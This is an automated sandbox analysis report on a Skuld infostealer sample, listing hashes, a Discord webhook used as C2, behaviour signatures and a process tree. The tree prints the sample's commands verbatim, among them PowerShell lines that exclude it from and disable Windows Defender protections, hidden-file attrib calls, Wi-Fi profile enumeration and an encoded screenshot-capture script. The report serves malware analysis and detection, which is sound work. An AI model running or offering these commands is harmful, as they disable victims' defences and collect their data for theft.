Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-09-2024 08:56

General

  • Target

    2024090806bba3de6cb897291a87e25dc1fb1348ngrbotpoetratsnatch.exe

  • Size

    9.8MB

  • MD5

    06bba3de6cb897291a87e25dc1fb1348

  • SHA1

    d6cee17ed905c50444389c1a856cffcb97ba7e51

  • SHA256

    d9e5cd6540b2b079303ece88e64defd80f86b4b61d83f17e0e935cff94d44734

  • SHA512

    044f9fc795255c1e79d2f1bcf5639eb6ce7a8d936f011a2da62c411c8b443fa4c51d6b0baff5fb233c23cb41ff465b5687bfd474e7ab7861edc291fcf4bad543

  • SSDEEP

    98304:AOYVw4GTh3/cwrBz9HJGalTbCekYTGMCBEXOTThZ4zzF:AW9h3/1walTbfkYTGMCC+szF

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1259097566084071475/ipsUcitO2Ssgzt0fWfy20DeLTo9uhG0Z863sOZgL2tjvYoK90r6Aeaf2NWiQQBpL2gfj

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024090806bba3de6cb897291a87e25dc1fb1348ngrbotpoetratsnatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024090806bba3de6cb897291a87e25dc1fb1348ngrbotpoetratsnatch.exe"
    1⤵
    • Drops file in Drivers directory
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\2024090806bba3de6cb897291a87e25dc1fb1348ngrbotpoetratsnatch.exe
      2⤵
      • Views/modifies file attributes
      PID:1908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2024090806bba3de6cb897291a87e25dc1fb1348ngrbotpoetratsnatch.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4156
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:404
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:1288
    • C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:4124
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:4260
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
        PID:716
      • C:\Windows\system32\attrib.exe
        attrib -r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:1452
      • C:\Windows\system32\attrib.exe
        attrib +r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:4272
      • C:\Windows\system32\netsh.exe
        netsh wlan show profiles
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:4696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iz3mbpup\iz3mbpup.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1800
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD52.tmp" "c:\Users\Admin\AppData\Local\Temp\iz3mbpup\CSC32E0921D895046DD877E19E8D92AFB23.TMP"
            4⤵
              PID:2756

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        d28a889fd956d5cb3accfbaf1143eb6f

        SHA1

        157ba54b365341f8ff06707d996b3635da8446f7

        SHA256

        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

        SHA512

        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        34f595487e6bfd1d11c7de88ee50356a

        SHA1

        4caad088c15766cc0fa1f42009260e9a02f953bb

        SHA256

        0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

        SHA512

        10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

      • C:\Users\Admin\AppData\Local\Temp\Di9BD1FqoQ\Display (1).png

        Filesize

        429KB

        MD5

        fe12679bc7905cdbbabc797b3313064e

        SHA1

        287d2ebf60448485677674e06f6acd8c6c94760b

        SHA256

        9b3ffa7caa5b426b68e34e4f3746fbd6047980072c660f38fc25593cadadc5ea

        SHA512

        31345f229cc05ffb6aaa8205adc9ea5ae817ff509cf699667d6585b8d8f34edd459fd9ddfb8dbe5a89ff81c5d4147df438ff42152cd8507552a2f4353bf0ab8e

      • C:\Users\Admin\AppData\Local\Temp\RESCD52.tmp

        Filesize

        1KB

        MD5

        b1014d80e3342b9d80f1eea52851f5c0

        SHA1

        5d8443d87c5071213b995395041d950e18834af7

        SHA256

        e7a1301fc52932e1d75c9bb035be06575a4b79d1f7bc381a30263ad7ff41fd31

        SHA512

        91f967c4d837e029c35f420ac6c846a881db504ab6b9b3d7395ef5df55de03e84b602af72802164d62457cac7f8fb0d96b7e21ed5137d418619595da45e5f22a

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1sk4gqbj.fwa.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\iz3mbpup\iz3mbpup.dll

        Filesize

        4KB

        MD5

        2292724ceeaf2692384efe99ecb1b4f0

        SHA1

        68eff4b80f9d11d40685da00a353a7daec46a3bf

        SHA256

        8121b58460c067933b914da6b96e3af177d09a9ef09dc2f942ad5da5a7e3f532

        SHA512

        0466e6ef3122938aa5b4db7e1418613170fff8334226e97a2e379c052ba4510b6b40ecd17aa4c4c002b14eb9bb34a4d9545bf15712e9ada39cd18815e2c45dce

      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

        Filesize

        9.8MB

        MD5

        06bba3de6cb897291a87e25dc1fb1348

        SHA1

        d6cee17ed905c50444389c1a856cffcb97ba7e51

        SHA256

        d9e5cd6540b2b079303ece88e64defd80f86b4b61d83f17e0e935cff94d44734

        SHA512

        044f9fc795255c1e79d2f1bcf5639eb6ce7a8d936f011a2da62c411c8b443fa4c51d6b0baff5fb233c23cb41ff465b5687bfd474e7ab7861edc291fcf4bad543

      • C:\Windows\System32\drivers\etc\hosts

        Filesize

        2KB

        MD5

        6e2386469072b80f18d5722d07afdc0b

        SHA1

        032d13e364833d7276fcab8a5b2759e79182880f

        SHA256

        ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

        SHA512

        e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

      • \??\c:\Users\Admin\AppData\Local\Temp\iz3mbpup\CSC32E0921D895046DD877E19E8D92AFB23.TMP

        Filesize

        652B

        MD5

        d710fdc5f250d0f91d9901e62c526a24

        SHA1

        53199088c94936ec4eeaa839ed629855481ea785

        SHA256

        3ae5861d0534d193396a4d5c65e25e94a33a86fd24ccc271c47397fdddea5157

        SHA512

        854fa1c26635132e3f05734a97bf1755e2897f51db8fbc7f15115d8e2997714be61bf39d26e0d7a253b05ad2e1295060d667266ec4d3a12179bb08b47351f08d

      • \??\c:\Users\Admin\AppData\Local\Temp\iz3mbpup\iz3mbpup.0.cs

        Filesize

        1004B

        MD5

        c76055a0388b713a1eabe16130684dc3

        SHA1

        ee11e84cf41d8a43340f7102e17660072906c402

        SHA256

        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

        SHA512

        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

      • \??\c:\Users\Admin\AppData\Local\Temp\iz3mbpup\iz3mbpup.cmdline

        Filesize

        607B

        MD5

        bd99f1aaf72647d15f0e1a60cc0ca023

        SHA1

        972d55406cee31bb3d197e39e95eb0ce61c1f08c

        SHA256

        d4ebe0977ee29a7631c286a756797f7a66a9622419ab968cade4f18b7b6f839a

        SHA512

        a2860449617a7dd5da8021723f926f6e2cbc40d9c3c751254e90c89c3170a57dec8eb526906b3460210fc88969ad9cc82543af0c153f3295c41612cdc2b4e57c

      • memory/2684-65-0x000001DCF4250000-0x000001DCF4258000-memory.dmp

        Filesize

        32KB

      • memory/4156-0-0x00007FF92D7B3000-0x00007FF92D7B5000-memory.dmp

        Filesize

        8KB

      • memory/4156-20-0x00007FF92D7B0000-0x00007FF92E271000-memory.dmp

        Filesize

        10.8MB

      • memory/4156-14-0x00007FF92D7B0000-0x00007FF92E271000-memory.dmp

        Filesize

        10.8MB

      • memory/4156-13-0x00007FF92D7B0000-0x00007FF92E271000-memory.dmp

        Filesize

        10.8MB

      • memory/4156-8-0x000001D705030000-0x000001D705052000-memory.dmp

        Filesize

        136KB